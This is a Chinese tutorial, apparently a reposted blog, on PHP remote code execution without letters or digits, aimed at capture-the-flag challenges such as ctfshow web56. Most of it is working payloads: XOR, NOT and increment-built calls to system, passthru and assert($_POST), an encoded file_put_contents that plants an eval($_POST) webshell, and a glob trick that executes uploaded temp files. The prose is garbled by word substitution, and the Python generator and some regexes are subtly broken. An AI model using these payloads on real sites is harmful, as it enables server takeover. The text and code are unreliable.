RCE之无字母数字RCE
单词字符(\w):巨细写字母 (a-z, A-Z)
数字 (0-9)
下划线 (_)
非单词字符(\W)是上面以外的任何字符,例如:
标点符号(如 !, @, #)
空格、换行符
其他非字母数字的字符
用运算符实现
https://i-blog.csdnimg.cn/img_convert/f1c7cc3cf50fcaf5dc79fb02c496242e.png
1、 异或运算符
^
两个字符异或使用后,会得到一个新的字符,例如:
h和[举行异或使用,得到的效果为3
这是由于,在ascii码表中:
h: 104 0x68 01101000
[: 91 0x5B 01011011
01101000和01011011逐位举行异或后,得到00110011,也就是0x33,在ascii码中表示是数字3:
<?php
$a = 'h'^'[';
echo $a;
?>
// 输出:3 例如像以下如许构造下令:
$__=("#"^"|"); // _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
$$__($$__); // $_POST($_POST); 使用时,讲上述构造的下令取消换行,并举行url编码,传入参数即可:
例如:
<?php
$w = $_GET['w'];
if (!preg_match("//"), $w){
eval($w);
}
?>
Payload可以写成:
?w=%24__%3D(%22%23%22%5E%22%7C%22)%3B%24__.%3D(%22.%22%5E%22~%22)%3B%24__.%3D(%22%2F%22%5E%22%60%22)%3B%24__.%3D(%22%7C%22%5E%22%2F%22)%3B%24__.%3D(%22%7B%22%5E%22%2F%22)%3B%24%24__%5B_%5D(%24%24__%5B__%5D)%3B&_=system&__=whoami
在实际应用中,可以通过python构造出我们须要的下令的异或算式,后续使用这个脚本,只须要修改payload和正则表达式即可
import re
import urllib.parse
import requests
def generate_xor_expression(payload, filter_regex):
"""
根据目标 payload 和过滤正则表达式,生成异或表达式。
参数:
payload: 目标字符串
filter_regex: 用于过滤字符的正则表达式
返回:
构造的异或表达式字符串
"""
xor_1 = ''
xor_2 = ''
usable_chars = []
# 找到没有被过滤的可用字符
for i in range(0xff):
if chr(i) not in filter_regex:
usable_chars.append(chr(i))
# 遍历目标 payload 的每个字符,找到对应的异或字符对
for k in range(len(payload)):
for i in usable_chars:
if chr(ord(i) ^ 127) == payload:# 检查两个字符异或结果是否等于目标字符
xor_1 += i
xor_2 += chr(127)
continue
# 构建最终的表达式,将字符进行URL编码
return "('" + urllib.parse.quote(xor_1) + "'^'" + urllib.parse.quote(xor_2) + "')"
# 测试函数
if __name__ == "__main__":
payload = "ls"# 要生成的目标 payload
filter_regex = r''# 定义过滤正则表达式
result = generate_xor_expression(payload, filter_regex)# 调用函数
print(result)# 打印最终生成的表达式
测试:
<?php
$c = $_GET['c'];
if(!preg_match("/+/", $c)) {
echo 'Yes';
eval($c);
} else {
echo 'No';
}
show_source(__FILE__);
?>
构建payload:passthru(ls)
('%0F%1E%0C%0C%0B%17%0D%0A'^'%7F%7F%7F%7F%7F%7F%7F%7F')('%13%0C'^'%7F%7F')
构建payload:passthru(ls)
('%0F%1E%0C%0C%0B%17%0D%0A'^'%7F%7F%7F%7F%7F%7F%7F%7F')('%13%0C'^'%7F%7F')
https://i-blog.csdnimg.cn/img_convert/511878d3562ef4132f19b9dc0316268b.png
2、 或运算符
|
同上异或的原理,不过须要改一下脚本里的运算符
3、 取反
~
<?php
$a = 'system';
$b = ~$a;
echo urlencode($b);
?> 得到的效果为%8C%86%8C%8B%9A%92,此时将改数据再取反,就可以得到我们想要的system,使用方式和异或部分同理。
4、 自增
使用自增,例如
"a"++ => "b" 以是,只要可以或许得到一个字符,我们就可以通过自增或自减的方式得到所有的字母。那么,要如何得到一个字母,例如A,在PHP中,逼迫连接数组和字符串的话,数组将会被转化为字符串,其值为“Array”。再取这个字符串的第一个字母,就可以得到A。
<?php
$a = ''.[];
var_dump($a);
https://i-blog.csdnimg.cn/img_convert/1e20891800d288ad1afa2cc62ee89d84.png
另有其他的取字母的方法,例如:
(0/0).'' //NAN
(1/0).'' //INF 参考佬的payload:
<?php
$_=[].''; //得到"Array"
$___ = $_[$__]; //得到"A",$__没有定义,默认为False也即0,此时$___="A"
$__ = $___; //$__="A"
$_ = $___; //$_="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"S",此时$__="S"
$___ .= $__; //$___="AS"
$___ .= $__; //$___="ASS"
$__ = $_; //$__="A"
$__++;$__++;$__++;$__++; //得到"E",此时$__="E"
$___ .= $__; //$___="ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++; //得到"R",此时$__="R"
$___ .= $__; //$___="ASSER"
$__++;$__++; //得到"T",此时$__="T"
$___ .= $__; //$___="ASSERT"
$__ = $_; //$__="A"
$____ = "_"; //$____="_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"P",此时$__="P"
$____ .= $__; //$____="_P"
$__ = $_; //$__="A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //得到"O",此时$__="O"
$____ .= $__; //$____="_PO"
$__++;$__++;$__++;$__++; //得到"S",此时$__="S"
$____ .= $__; //$____="_POS"
$__++; //得到"T",此时$__="T"
$____ .= $__; //$____="_POST"
$_ = $$____; //$_=$_POST
$___($_); //ASSERT($POST)
PHP7和PHP5中的特性
assert是无字母数字RCE中很重要的一个函数,但是php5和php7中的这个函数是有区别的。在php5中,assert是一个函数,因此我们可以动态调用。但是在PHP7中,assert不再是一个函数,而是酿成了一个语言结构,不能再作为函数名动态实行代码。在php7中,可以通过($a)()如许的方式来实行下令,也就是说我们对phpinfo取反之后就可以直接实行了,亦或用file_put_contents来写shell。
php7中
例如想实行phpinfo(),可以写成(phpinfo)(),使用取反构造payload:
(~%8F%97%8F%96%91%99%90)() // phpinfo
https://i-blog.csdnimg.cn/img_convert/da5fdd15cbc297252cde9200263ea6eb.png
乃至可以直接写马file_put_contents('4.php','<?php eval(\$_POST);');
(~(%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C))(~(%CB%D1%8F%97%8F),~(%C3%C0%8F%97%8F%DF%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4));
https://i-blog.csdnimg.cn/img_convert/dc9c21ffc786693f39805042838f203e.png
乐成写入
php5中
在php5中,不支持用($a)()如许的语句来调用函数,因此须要思量用一些更巧妙的技巧
这种绕过方式最重要使用到的特性:
php在处理惩罚上传的文件时,会将其保存在临时文件夹下(/tmp),而且默认的文件名为/tmp/phpXXXXXX的形式,文件名的后六位为随机的巨细写字母
可以使用.来实行任意文件,纵然这个文件没有实行权限
Linux下的文件可以使用通配符表示
我们在php中上传的文件,会被临时放到tmp目录下而且目录为/tmp/phpXXXXXX,但是只是放到该目录下是达不到我们的目的的,那么就须要想办法实行他。此时就想到了Linux中的.,.在实行一个文件的时候,不须要改文件具有实行权限,.代表的是当前的shell,. file也就是使用当前的shell来实行file文件。那么结合起来想一下,假如有一个可以举行rce的点,纵然是过滤了字母数字的情况下,我们不就可以使用.来实行我们上传的临时文件了吗。
但是又出现题目了,本文不就是在讲无字母数字的情况如何举行rce吗,不能传入字母、数字,要怎么获取到上传的临时文件呢。我们就可以使用通配符,例如/tmp/phpXXXXXX就可以被表示为/???/?????????。
但是,当我们像如许去尝试获取php上传的临时文件时,又出现了题目,有很多能满足/???/?????????匹配格式的文件,以下引用p神的图
https://i-blog.csdnimg.cn/img_convert/32c62775dbd27e21fd820eacdf1e3982.png
https://i-blog.csdnimg.cn/img_convert/68cbd78858a2ce5cab1a64f2f36f20c8.png
可以看到,如许的结构,匹配到了这么多文件,而且我们在php中上传天生的临时文件,排到了第6位,那么,在实行. /???/?????????时,就可能在前面的过程中出现题目,然后就导致整个流程停止,无法实行到我们上传的文件。
那么如何解决,过细观察,可以发现这些列出来的文件中,只有php的临时文件中存在大写字母,而且,在glob通配符中,支持使用[^x]的方法构造表示“这个位置不是字符x”的表达式,因为^在方括号中表示非。一下继承引用p神的图,同理就可以过滤掉很多文件
https://i-blog.csdnimg.cn/img_convert/d99a2621865c13555971761a05c4a75a.png
那么,同理,我们可以通过表达式,去匹配出文件名中带有大写字母的文件,就是php上传文件后天生的临时文件。
可以看到,大写字母在ascii码表上是介于@和[这两个符号之间的,那么在表达式中就可以使用[@-[]来表示大写字母
. /???/????????[@-[]
那么payload就可以这么打
?><?=`. /???/????????[@-[]`;?> ctfshow web56例题参考ctfshow-web入门-下令实行(web56、web57、web58)_ctfshow web56-CSDN博客
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]